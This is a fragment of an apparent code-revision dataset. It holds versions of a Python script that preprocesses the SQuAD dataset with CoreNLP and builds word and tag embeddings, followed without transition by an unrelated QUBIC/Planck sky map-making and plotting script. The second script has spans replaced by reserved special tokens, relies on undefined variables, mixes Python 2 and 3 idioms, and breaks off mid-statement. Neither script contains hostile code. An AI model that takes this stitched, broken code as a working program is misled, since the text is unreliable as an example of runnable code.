sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in 
enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with 
open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open('{}.pos'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n max_node = 0\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.label'.\n format(para_file), 'a') as fl, open('{}.index'.format(answer_file), 'r'\n ) as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n 
embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', '-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = ['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, 
open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in (pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n 
char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, message='pos embedding')\n save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, token_embedding_file)\n\n\nif __name__ == '__main__':\n os.system(\n 'mkdir data; mkdir data/processed; mkdir data/processed/train; mkdir data/processed/dev; mkdir data/processed/test'\n )\n get_data('../../LIB/squad/train-v1.1.json',\n '../../LIB/squad/dev-v1.1.json', '../../LIB/squad/doclist-test.txt',\n 'data/processed')\n",
"step-5": "\"\"\"\nData pre-processing\n\"\"\"\nimport os\nimport corenlp\nimport numpy as np\nimport ujson as json\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom bilm import dump_token_embeddings\nimport sys\nsys.path.append('../..')\n\nfrom LIB.utils import save\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = \"{}/paras\".format(outpur_dir)\n question_file = \"{}/questions\".format(outpur_dir)\n sent_file = \"{}/sents\".format(outpur_dir)\n answer_file = \"{}/answers\".format(outpur_dir)\n print(\"Generating {} raw data...\".format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, \"r\") as fh, corenlp.CoreNLPClient(annotators=\"tokenize ssplit pos ner\".split(),\n endpoint=\"http://localhost:9099\", timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source[\"data\"]):\n title = article[\"title\"]\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article[\"paragraphs\"]:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [], [], []\n answers_index, sents_index = [], []\n # paragraph\n context = para[\"context\"]\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.token), ann_para.sentence)))\n ann_para_tokens, paragraph_tokens, paragraph_pos, paragraph_ner = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n 
ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n\n # questions\n for qa in para[\"qas\"]:\n # question\n ques = qa[\"question\"]\n id = qa[\"id\"]\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n\n # answer\n all_answer_tokens, all_answer_pos, all_answer_ner, all_answer_index = [], [], [], []\n all_sent_tokens, all_sent_pos, all_sent_ner, all_sent_index = [], [], [], []\n for answer in qa[\"answers\"]:\n answer_text = answer[\"text\"]\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n # sentence\n sentence = []\n for sent in ann_para.sentence:\n if sent.characterOffsetBegin <= answer_start <= sent.characterOffsetEnd or \\\n sent.characterOffsetBegin <= answer_end <= sent.characterOffsetEnd:\n sentence.append(sent)\n sentence = [token for sent in sentence for token in sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n\n # sentence index\n y1_sent = 
sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n # answer index\n y1_ans = None\n for i, token in enumerate(sentence):\n if token.beginChar - 1 <= answer_start <= token.endChar:\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n all_answer_index.append(\"{},{}\".format(y1_ans, y2_ans))\n all_sent_index.append(\"{},{}\".format(y1_sent, y2_sent))\n\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n\n # save para\n with open(\"{}.tok\".format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open(\"{}.pos\".format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open(\"{}.ner\".format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open(\"{}.id\".format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n # save question\n with open(\"{}.tok\".format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open(\"{}.pos\".format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open(\"{}.ner\".format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n\n # save answer\n with open(\"{}.tok\".format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with 
open(\"{}.pos\".format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open(\"{}.ner\".format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open(\"{}.index\".format(answer_file), 'a') as f:\n f.write(\"\\n\".join(answers_index) + '\\n')\n\n # save sent\n with open(\"{}.tok\".format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open(\"{}.pos\".format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open(\"{}.ner\".format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open(\"{}.index\".format(sent_file), 'a') as f:\n f.write(\"\\n\".join(sents_index) + '\\n')\n # get BIO labels\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n # get the answer BIO label for paragraph\n max_node = 0\n with open(\"{}.tok\".format(para_file), 'r') as fp, open(\"{}.label\".format(para_file), 'a') as fl, \\\n open(\"{}.index\".format(answer_file), 'r') as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n # answer words\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n # non answer words\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n\n process(train_json, \"{}/train/\".format(output_dir), exclude_titles=test_titles)\n process(dev_json, \"{}/dev/\".format(output_dir))\n process(train_json, \"{}/test/\".format(output_dir), include_titles=test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size, 
vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print(\"Generating word embedding...\")\n # load word embeddings\n embedding_dict = {}\n with open(emb_file, \"r\", encoding=\"utf-8\") as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n\n TRANSLATE = {\n \"-lsb-\": \"[\", \"-rsb-\": \"]\", \"-lrb-\": \"(\", \"-rrb-\": \")\", \"-lcb-\": \"{\",\n \"-rcb-\": \"}\", \"-LSB-\": \"[\", \"-RSB-\": \"]\", \"-LRB-\": \"(\", \"-RRB-\": \")\",\n \"-LCB-\": \"{\", \"-RCB-\": \"}\"\n }\n SPECIAL_TOKENS = [\"<NULL>\", \"<UNK>\", \"<S>\", \"</S>\"]\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print(\"Generating {} tag embedding...\".format(data_type))\n SPECIAL_TOKENS = [\"<NULL>\", \"<UNK>\"]\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x[1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print(\"Get the vocabulary...\")\n 
word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open(\"{}.tok\".format(para_file), 'r') as fp, open(\"{}.tok\".format(que_file), 'r') as fq, \\\n open(\"{}.pos\".format(para_file), 'r') as fpp, open(\"{}.pos\".format(que_file), 'r') as fqp, \\\n open(\"{}.ner\".format(para_file), 'r') as fpn, open(\"{}.ner\".format(que_file), 'r') as fqn, \\\n open(\"{}.label\".format(para_file), 'r') as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in para_tokens + que_tokens:\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in pos_tags + que_pos_tags:\n pos_counter[pos_tag] += 1\n for ner_tag in ner_tags + que_ner_tags:\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter, emb_file=config.glove_word_file,\n emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit,\n vec_size=config.glove_dim, vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, \"char\", vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, \"pos\", vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = 
get_tag_embedding(ner_counter, \"ner\", vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter, \"label\", vec_size=config.label_dim)\n print(\"{} out of {} are not in glove\".format(unk_num, len(word2idx_dict)))\n print(\"{} chars\".format(char_emb_mat.shape[0]))\n print(\"{} pos tags, {} ner tags, {} answer labels, {} chars\".format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0], char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message=\"word embedding\")\n save(config.char_emb_file, char_emb_mat, message=\"char embedding\")\n save(config.pos_emb_file, pos_emb_mat, message=\"pos embedding\")\n save(config.ner_emb_file, ner_emb_mat, message=\"ner embedding\")\n save(config.label_emb_file, label_emb_mat, message=\"label embedding\")\n save(config.word_dictionary, word2idx_dict, message=\"word dictionary\")\n save(config.char_dictionary, char2idx_dict, message=\"char dictionary\")\n save(config.pos_dictionary, pos2idx_dict, message=\"pos dictionary\")\n save(config.ner_dictionary, ner2idx_dict, message=\"ner dictionary\")\n save(config.label_dictionary, label2idx_dict, message=\"label dictionary\")\n print(\"Dump elmo word embedding...\")\n token_embedding_file = config.embedding_file\n dump_token_embeddings(\n config.vocab_file, config.elmo_options_file, config.elmo_weight_file, token_embedding_file\n )\n\n\nif __name__ == '__main__':\n # process data\n os.system(\"mkdir data; mkdir data/processed; mkdir data/processed/train; \"\n \"mkdir data/processed/dev; mkdir data/processed/test\")\n get_data(\"../../LIB/squad/train-v1.1.json\", \"../../LIB/squad/dev-v1.1.json\",\n \"../../LIB/squad/doclist-test.txt\", \"data/processed\")",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def statstr(vec):
    """Summarize *vec* as a 'mean +/- standard deviation' string (4 decimals)."""
    mean_val = np.mean(vec)
    std_val = np.std(vec)
    return '%.4f +/- %.4f' % (mean_val, std_val)
def plotinst(inst, shift=0.12):
    # Scatter-plot the detector centres of an instrument in the focal plane:
    # quadrants 0-3 as red dots, quadrants >= 4 as blue dots shifted right by
    # *shift* so the two groups do not overlap.
    # NOTE(review): relies on pylab-style globals `plot`/`xlim` being in scope
    # (no explicit pyplot import is visible in this chunk) -- confirm.
    for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
        if quad < 4:
            plot(xyc[0], xyc[1], 'ro')
        else:
            plot(xyc[0] + shift, xyc[1], 'bo')
    xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
    # Draw gnomonic views of the I, Q, U planes of *input* (last axis is the
    # Stokes component) into a 3x3 subplot grid starting at panel *iplot*,
    # titled "<msg> I/Q/U", and return the list of projected maps.
    # Uses the module-level `center` as the rotation centre.
    # NOTE(review): mutable default `Trange` is only read here, so harmless.
    out = []
    for i, (kind, lim) in enumerate(zip('IQU', Trange)):
        map = input[..., i]
        out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
            max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
            return_projected_map=True)]
    return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
    True, color=None):
    """Bin *y* against *x* and return the per-bin mean profile.

    x, y       : 1-D arrays of matching length.
    range      : (min, max) of x to profile; defaults to the data range.
                 (Parameter name kept for backward compatibility even though
                 it shadows the `range` builtin.)
    nbins      : number of equal-width bins.
    fmt, color : passed to `errorbar` when *plot* is True.
    plot       : if True, draw the profile (needs a pylab-style `errorbar`).
    dispersion : if True, dy is the in-bin scatter (std); otherwise the
                 error on the mean (std / sqrt(N)).

    Returns (xc, yval, dx, dy): bin centres, bin means, half bin widths and
    per-bin uncertainties.  Points exactly on a bin edge are excluded by the
    strict inequalities below; empty bins yield NaN.
    """
    if range is None:  # identity test instead of `== None`
        mini = np.min(x)
        maxi = np.max(x)
    else:
        mini = range[0]
        maxi = range[1]
    binwidth = (maxi - mini) / nbins
    xmin = np.linspace(mini, maxi - binwidth, nbins)
    xmax = xmin + binwidth
    xc = xmin + binwidth / 2
    yval = np.zeros(nbins)
    dy = np.zeros(nbins)
    dx = np.zeros(nbins) + binwidth / 2
    # np.arange, not range(): the builtin is shadowed by the parameter above.
    for i in np.arange(nbins):
        ok = (x > xmin[i]) & (x < xmax[i])
        yval[i] = np.mean(y[ok])
        if dispersion:
            fact = 1
        else:
            fact = np.sqrt(len(y[ok]))
        dy[i] = np.std(y[ok]) / fact
    if plot:
        errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
    return xc, yval, dx, dy
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def statstr(vec):
m = np.mean(vec)
s = np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m, s)
def plotinst(inst, shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0], xyc[1], 'ro')
else:
plot(xyc[0] + shift, xyc[1], 'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
return_projected_map=True)]
return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini, maxi - dx, nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok]) / fact
if plot:
errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
<|reserved_special_token_0|>
for i in xrange(len(all_instruments)):
acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=
detector_nep[i])
all_coverages.append(acq_qubic.get_coverage())
convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky
)
acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
H = acq_fusion.get_operator()
invntt = acq_fusion.get_invntt_operator()
obs = acq_fusion.get_observation()
A = H.T * invntt * H
b = H.T * invntt * obs
solution_fusion = pcg(A, b, disp=True)
all_solutions_fusion.append(solution_fusion)
<|reserved_special_token_0|>
for i in xrange(len(nbptg)):
figure(i)
resid = all_solutions_fusion[i]['x'] - convolved_sky
resid[~mask, :] = 0
display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))
<|reserved_special_token_0|>
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
subplot(3, 1, 1)
yscale('log')
xlabel('Normalized coverage')
ylabel('I RMS residuals')
ylim(0.1, 2)
plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
yscale('log')
xlabel('Normalized coverage')
ylabel('Q RMS residuals')
ylim(0.1, 2)
plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
yscale('log')
xlabel('Normalized coverage')
ylabel('U RMS residuals')
ylim(0.1, 2)
plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
<|reserved_special_token_0|>
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
